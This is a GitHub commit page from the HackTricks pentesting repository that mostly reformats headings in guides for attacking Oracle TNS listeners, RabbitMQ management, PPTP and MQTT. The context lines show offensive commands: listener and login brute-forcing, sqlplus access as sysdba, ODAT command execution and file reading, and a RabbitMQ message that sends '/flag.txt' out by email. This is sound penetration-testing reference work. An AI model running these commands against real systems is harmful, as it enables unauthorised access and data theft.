Skip to content

Commit

Permalink
fix mess 2
Browse files Browse the repository at this point in the history
  • Loading branch information
carlospolop committed May 1, 2022
1 parent dd63321 commit 523c520
Show file tree
Hide file tree
Showing 291 changed files with 2,710 additions and 3,266 deletions.
42 changes: 20 additions & 22 deletions pentesting/1521-1522-1529-pentesting-oracle-listener/README.md
View file
Original file line number Diff line number Diff line change
Expand Up @@ -17,9 +17,7 @@ Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
</details>


# 1521,1522-1529 - Pentesting Oracle TNS Listener

## Basic Information
# Basic Information

Oracle database \(Oracle DB\) is a relational database management system \(RDBMS\) from the Oracle Corporation \(from [here](https://www.techopedia.com/definition/8711/oracle-database)\).

Expand All @@ -30,7 +28,7 @@ When enumerating Oracle the first step is to talk to the TNS-Listener that usual
1748/tcp open oracle-tns Oracle TNS Listener
```

## Summary
# Summary

1. **Enumerate version** info \(search for **known vulns**\)
2. **Bruteforce TNS listener** communication \(not always needed\)
Expand All @@ -40,11 +38,11 @@ When enumerating Oracle the first step is to talk to the TNS-Listener that usual

In order to user MSF oracle modules you need to install some dependencies: [**Installation**](oracle-pentesting-requirements-installation.md)

## Enumeration
# Enumeration

Tools that can be used for this are: nmap, MSF and [tnscmd10g](http://dokfleed.net/files/audit/tnscmd10g.zip).

### TNS listener version
## TNS listener version

```bash
nmap --script "oracle-tns-version" -p 1521 -T4 -sV <IP>
Expand Down Expand Up @@ -74,9 +72,9 @@ hydra -P rockyou.txt -t 32 -s 1521 host.victim oracle-listener

The TNS listener could be vulnerable to **MitM** attacks. [Check here how to check if the server is vulnerable and how to perform the attack \(all versions up to version 12c are\)](tns-poison.md).

### SID enumeration
## SID enumeration

#### **What is a SID**
### **What is a SID**

The SID \(Service Identifier\) is essentially the database name, depending on the install you may have one or more default SIDs, or even a totally custom dba defined SID.

Expand Down Expand Up @@ -118,15 +116,15 @@ In order to use **oracle\_login** with **patator** you need to **install**:
pip3 install cx_Oracle --upgrade
```

## **Targeting Accounts**
# **Targeting Accounts**

**Got SID?** Excellent, now let’s move to the next task and extract the user account information. From this point, you can connect to the listener and brute-force credentials.

**Metasploit** _**scanner/oracle/oracle\_login_ It has a built-in dictionary for the **most popular default values of user account** information presented as login:password. By the way, such default entries represent one of the most popular and serious security problems in Oracle.

**Nmap** can also help here with the script _oracle-brute_. Note that this script **mixes the logins and passwords**, that is, it tries each login against every password, and it takes quite a while!

### **Default Passwords**
## **Default Passwords**

Below are some of the default passwords associated with Oracle:

Expand All @@ -141,7 +139,7 @@ Other **default passwords** can be found [here ](http://www.petefinnigan.com/def

The versions 11.1.0.6, 11.1.0.7, 11.2.0.1, 11.2.0.2, and 11.2.0.3 are vulnerable to **offline brute force**. [**Read more about this technique here.**](remote-stealth-pass-brute-force.md)

### User/Pass bruteforce
## User/Pass bruteforce

Different tools offered **different user/pass lists** for oracle:

Expand All @@ -156,7 +154,7 @@ I have **mixed** all of them and **removed duplicates:**

{% file src="../../.gitbook/assets/pass-oracle.txt" %}

### [Brute Force](../../brute-force.md#oraclesql)
## [Brute Force](../../brute-force.md#oraclesql)

Now, that you **know a valid SID and valid credentials**. To connect to the database you need the tool: _**sqlplus**_ and to install it you need to follow some steps:

Expand All @@ -182,7 +180,7 @@ sqlplus <username>/<password>@<ip_address>/<SID> 'as sysdba';
sqlplus SYSTEM/[email protected]/ORCL 'as sysdba'
```

## **All in One**
# **All in One**

**An interesting tool is oscanner**, which will try to get some valid SID and then it will brute-force for valid credentials and try to extract some information:

Expand All @@ -209,35 +207,35 @@ For **each valid account** \(e.g. _SYS_\) **on each valid instance** \(SID\), OD

[**Wiki odat**](https://github.com/quentinhardy/odat/wiki)

## Remote Code Execution
# Remote Code Execution

There are at least two different ways to execute commands, such as by using Java procedures and DBMS\_SCHEDULER package. By the way, you can also achieve RCE in case of SQL injection in a web application provided, of course, that the user running it has sufficient rights. At this stage, I highly recommend preparing the Oracle Database Attacking Tool: [ODAT](https://github.com/quentinhardy/odat).

### Install ODAT
## Install ODAT

```bash
git clone https://github.com/quentinhardy/odat.git
cd odat
./odat.py #It shouldn't be problems in Kali
```

### Execute Code via Java Stored Procedure
## Execute Code via Java Stored Procedure

```bash
./odat.py java -s <IP> -U <username> -P <password> -d <SID> --exec COMMAND
```

[More details here](oracle-rce-and-more.md#rce-java-store-procedure)

### Execute code via Scheduler
## Execute code via Scheduler

```bash
./odat.py dbmsscheduler -s <IP> -d <SID> -U <username> -P <password> --exec "C:\windows\system32\cmd.exe /c echo 123&gt;&gt;C:\hacK"
```

[More details here](oracle-rce-and-more.md#rce-scheduler)

### Execute code via External Tables
## Execute code via External Tables

```bash
./odat.py externaltable -s <IP> -U <username> -P <password> -d <SID> --exec "C:/windows/system32" "calc.exe"
Expand All @@ -247,7 +245,7 @@ cd odat

[More details here.](oracle-rce-and-more.md#rce-external-tables)

## Read/Write files
# Read/Write files

```bash
./odat.py utlfile -s <IP> -d <SID> -U <username> -P <password> --getFile "C:/test" token.txt token.txt
Expand All @@ -256,7 +254,7 @@ cd odat

[More details here](oracle-rce-and-more.md#read-write-files)

## Elevating Privileges
# Elevating Privileges

[More details here](oracle-rce-and-more.md#elevating-privileges)

Expand All @@ -272,7 +270,7 @@ Vulnerability tested on oracle 10.1.0.3.0 – should work on thru 10.1.0.5.0 and
msf> use auxiliary/sqli/oracle/lt_findricset_cursor
```

## Free Virtual Environment for testing
# Free Virtual Environment for testing

If you want to practice attacking Oracle databases, the safest way is to register for the Oracle Developer Days Virtualbox VM:

Expand All @@ -284,7 +282,7 @@ Other interesting **references**:

[http://blog.opensecurityresearch.com/2012/03/top-10-oracle-steps-to-secure-oracle.html](http://blog.opensecurityresearch.com/2012/03/top-10-oracle-steps-to-secure-oracle.html)

## HackTricks Automatic Commands
# HackTricks Automatic Commands

```text
Protocol_Name: Oracle #Protocol Abbreviation if there is one.
Expand Down
6 changes: 2 additions & 4 deletions ...-1529-pentesting-oracle-listener/oracle-pentesting-requirements-installation.md
View file
Original file line number Diff line number Diff line change
Expand Up @@ -17,9 +17,7 @@ Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
</details>


# Oracle Pentesting requirements installation

## Installation of tools (sqlplus) and needed libraries to use the oracle MSF modules
# Installation of tools (sqlplus) and needed libraries to use the oracle MSF modules

_(This installation guide was created for version 12.1.0.1.0, change that name for the version that you download)_

Expand Down Expand Up @@ -63,7 +61,7 @@ If you have succeeded, you should be able to run `sqlplus` from a command prompt
sqlplus <username>/<password>@<ip_address>/<SID>;
```

### **Step Two — Install Ruby Gem ruby-oci8**
## **Step Two — Install Ruby Gem ruby-oci8**

_These steps are needed to use metasploit oracle modules_

Expand Down
12 changes: 5 additions & 7 deletions pentesting/1521-1522-1529-pentesting-oracle-listener/oracle-rce-and-more.md
View file
Original file line number Diff line number Diff line change
Expand Up @@ -17,9 +17,7 @@ Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
</details>


# Oracle RCE & more

## RCE: Java Store Procedure
# RCE: Java Store Procedure

So, imagine that you have the administrator account information. In this case, a very popular way to execute your command on the server is to write a ‘java stored’ procedure. This is done in three stages. First, create a Java class called ‘oraexec’. To do this, connect via ‘sqlplus’ terminal and write:

Expand Down Expand Up @@ -56,7 +54,7 @@ Note that when using the above procedure, we cannot see the results of executed

However, there is a \[more sophisticated script\] \(goo.gl/EuwPRU\) that handles the command output, but it has a larger size [here](https://oracle-base.com/articles/8i/shell-commands-from-plsql).

## RCE: Scheduler
# RCE: Scheduler

The next method, which will help us if there is no Java virtual machine, is to use ‘dbmsscheduler’, the built-in task scheduler of Oracle. To use it, you must have the privilege ‘CREATE EXTERNAL JOB’. Here’s a code sample that implements the entry of ‘0wned’ string into a text file in the root of the C: drive:

Expand All @@ -73,7 +71,7 @@ select SYS.KUPP$PROC.CREATE_MASTER_PROCESS('DBMS_SCHEDULER.create_program(''xxx'

Note that, when you use the Scheduler, you can run this job more than once and do it with some frequency. As a result, this will help you get a foothold in the tested system, because, even if the administrator deletes the user from OS, this job, which is regularly running in the system, will bring him or her back to life.

## RCE: External Tables
# RCE: External Tables

As the last method for achieving the execution of OS commands, I would like to mention the use of External Tables. This method will help you later download files from the server. You will need the following privileges:

Expand Down Expand Up @@ -131,7 +129,7 @@ The terminal will start to display error messages that the system cannot match t

‘ODAT.py’ utility also can implement this attack. However, it requires the privilege ‘CREATE ANY DIRECTORY’, which, by default, is granted only to DBA role, since it attempts to execute the file from any and not only “your” directory.

## Read/Write files
# Read/Write files

Now, let’s proceed to the task of reading and writing the files. If you simply need to read or write a file to the server, you can do it without any Java procedures, which, however, can also handle such tasks. Let’s have a look into ‘UTL\_FILE’ package that has the functionality required for working with the file system. The good news is that, by default, it can be accessed by all users with ‘PUBLIC’ role. The bad news is that, by default, this procedure has no access to the entire file system, but only to a directory pre-defined by the administrator. However, it is not uncommon to find a directory parameter specified as ‘\*’, which literally means “access to everything.” You can find this out by using the following command:

Expand Down Expand Up @@ -176,7 +174,7 @@ The second method that I would like to mention is to use again the ‘External T
./odat.py externaltable -s <IP> -U <username> -P <password> -d <SID> --getFile "C:/test" "my4.txt" "my"
```

## Elevating Privileges
# Elevating Privileges

You can use various methods to elevate privileges, ranging from classic buffer overflows and DLL patching to specialized attacks against databases, such as PL/SQL injections. The topic is very extensive and, in this article, I will not dwell on it, as this is discussed in large research papers, such as those found in the blogs of \[Lichfield\] \(goo.gl/IebQN4\) and \[Finnigan\] \(goo.gl/vXhttf\). I will just demonstrate some of them, so that you have a general idea. During the testing, I recommend simply paying attention to current privileges and, based on this, search for desired loopholes in the Internet.

Expand Down
6 changes: 2 additions & 4 deletions ...ng/1521-1522-1529-pentesting-oracle-listener/remote-stealth-pass-brute-force.md
View file
Original file line number Diff line number Diff line change
Expand Up @@ -17,9 +17,7 @@ Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
</details>


# Remote stealth pass brute force

## Outer Perimeter: Remote stealth pass brute force
# Outer Perimeter: Remote stealth pass brute force

**The versions 11.1.0.6, 11.1.0.7, 11.2.0.1, 11.2.0.2, and 11.2.0.3 are vulnerable** to this technique. In order to understand the idea behind this vulnerability, you need to consider how the authentication protocol works with the database. I will show it for version 11. The interaction with the server proceeds as follows:

Expand All @@ -38,7 +36,7 @@ Summing it all up:
2. Extract **HEX values for AUTH\_SESSKEY, AUTH\_VFR\_DATA**.
3. Insert them into [**PoC script**](https://www.exploit-db.com/exploits/22069), which will perform a dictionary (brute force) attack.

### Using nmap and john
## Using nmap and john

```
root@kali:~# nmap -p1521 --script oracle-brute-stealth --script-args oracle-brute-stealth.sid=DB11g -n 10.11.21.30
Expand Down
2 changes: 0 additions & 2 deletions pentesting/1521-1522-1529-pentesting-oracle-listener/tns-poison.md
View file
Original file line number Diff line number Diff line change
Expand Up @@ -19,8 +19,6 @@ Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)

# TNS Poison

## TNS Poison

If you encounter a newer version of the listener, there is not much room left except brute-forcing. However, all versions up to version 12c are vulnerable to an attack called ‘TNS Poison’. Though the latter version is vulnerable only in some special configurations. For example, one of the ways to fix this vulnerability is by disabling the dynamic configuration of the listener, which is impossible when using Oracle DataGuard, PL/SQL Gateway in connection with APEX and in some versions of SAP. In general, the issue is that, by default, the listener service supports remote configuration and, in addition, it allows to do it anonymously. This is where the heart of vulnerability lies.

[![Fig. 1. TNS Poison Vulnerability](https://hackmag.com/wp-content/uploads/2015/04/poison.png)](https://hackmag.com/wp-content/uploads/2015/04/poison.png)
Expand Down
8 changes: 3 additions & 5 deletions pentesting/15672-pentesting-rabbitmq-management.md
View file
Original file line number Diff line number Diff line change
Expand Up @@ -17,17 +17,15 @@ Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
</details>


# 15672 - Pentesting RabbitMQ Management

## Basic Information
# Basic Information

You can learn more about RabbitMQ in [**5671,5672 - Pentesting AMQP**](5671-5672-pentesting-amqp.md).\
In this port you may find the RabbitMQ Management web console if the [management plugin](https://www.rabbitmq.com/management.html) is enabled.\
The main page should looks like this:

![](<../.gitbook/assets/image (270).png>)

## Enumeration
# Enumeration

The default credentials are "_**guest**_":"_**guest**_". If they aren't working you may try to [**brute-force the login**](../brute-force.md#http-post-form).

Expand Down Expand Up @@ -57,7 +55,7 @@ Content-Length: 267
{"vhost":"/","name":"amq.default","properties":{"delivery_mode":1,"headers":{}},"routing_key":"email","delivery_mode":"1","payload":"{\"to\":\"[email protected]\", \"attachments\": [{\"path\": \"/flag.txt\"}]}","headers":{},"props":{},"payload_encoding":"string"}
```

### Shodan
## Shodan

* `port:15672 http`

Expand Down
11 changes: 5 additions & 6 deletions pentesting/1723-pentesting-pptp.md
View file
Original file line number Diff line number Diff line change
Expand Up @@ -17,23 +17,22 @@ Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
</details>


# 1723 - Pentesting PPTP
# Basic Information

## Basic Information

Commonly used to provide remote access to mobile devices, Point-to-Point Tunneling Protocol \(PPTP\) uses TCP port 1723 for key exchange and IP protocol 47 \(GRE\) to encrypt data between peers.
Commonly used to provide remote access to mobile devices, Point-to-Point Tunneling Protocol \(PPTP\) uses TCP port 1723 for key exchange and IP protocol 47 \(GRE\) to encrypt data between peers.

**Default Port**:1723

## Enumeration
# Enumeration

```bash
nmap –Pn -sSV -p1723 <IP>
```

### [Brute Force](../brute-force.md#pptp)
## [Brute Force](../brute-force.md#pptp)

## Vulnerabilities
# Vulnerabilities

{% embed url="https://www.schneier.com/academic/pptp/" %}

Expand Down
18 changes: 8 additions & 10 deletions pentesting/1883-8883-pentesting-mqtt-mosquitto.md
View file
Original file line number Diff line number Diff line change
Expand Up @@ -17,9 +17,7 @@ Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
</details>


# 1883,8883 - Pentesting MQTT (Mosquitto)

## Basic Information
# Basic Information

MQTT stands for MQ Telemetry Transport. It is a publish/subscribe, **extremely simple and lightweight messaging protocol**, designed for constrained devices and low-bandwidth, high-latency or unreliable networks. The design principles are to minimise network bandwidth and device resource requirements whilst also attempting to ensure reliability and some degree of assurance of delivery. These principles also turn out to make the protocol ideal of the emerging “machine-to-machine” (M2M) or “Internet of Things” world of connected devices, and for mobile applications where bandwidth and battery power are at a premium.

Expand All @@ -30,15 +28,15 @@ PORT STATE SERVICE REASON
1883/tcp open mosquitto version 1.4.8 syn-ack
```

## Inspecting the traffic
# Inspecting the traffic

MQTT brokers send a **CONNACK** packet in **response** to a CONNECT packet. The **return code 0x00** indicates the credentials are valid and the return code **0x05 indicates they aren't. 0x05 example:**

![](<../.gitbook/assets/image (645) (1).png>)

### [**Brute-Force MQTT**](../brute-force.md#mqtt)
## [**Brute-Force MQTT**](../brute-force.md#mqtt)

## Pentesting MQTT
# Pentesting MQTT

**Authentication is totally optional** and even if authentication is being performed, **encryption is not used by default** (credentials are sent in clear text). MITM attacks can still be executed to steal passwords.

Expand Down Expand Up @@ -91,11 +89,11 @@ if __name__ == "__main__":
main()
```

## More information
# More information

from here: [https://morphuslabs.com/hacking-the-iot-with-mqtt-8edaf0d07b9b](https://morphuslabs.com/hacking-the-iot-with-mqtt-8edaf0d07b9b)

### The Publish/Subscribe Pattern <a href="#b667" id="b667"></a>
## The Publish/Subscribe Pattern <a href="#b667" id="b667"></a>

The publish/subscribe model is composed of:

Expand All @@ -106,7 +104,7 @@ The publish/subscribe model is composed of:

![](https://miro.medium.com/max/1073/1\*sIxvchdgHSqAGebJjFHBAg.png)

### Packet Format <a href="#f15a" id="f15a"></a>
## Packet Format <a href="#f15a" id="f15a"></a>

Every MQTT packet contains a fixed header (Figure 02).Figure 02: Fixed Header

Expand All @@ -116,7 +114,7 @@ The first field of the fixed header represents the type of the MQTT Packet. All

![](https://miro.medium.com/max/1469/1\*z0fhdUVzGa0PLikH\_cyBmQ.png)

## Shodan
# Shodan

* `port:1883 MQTT`
* `port:8883 MQTT`
Expand Down
Loading

0 comments on commit 523c520

Please sign in to comment.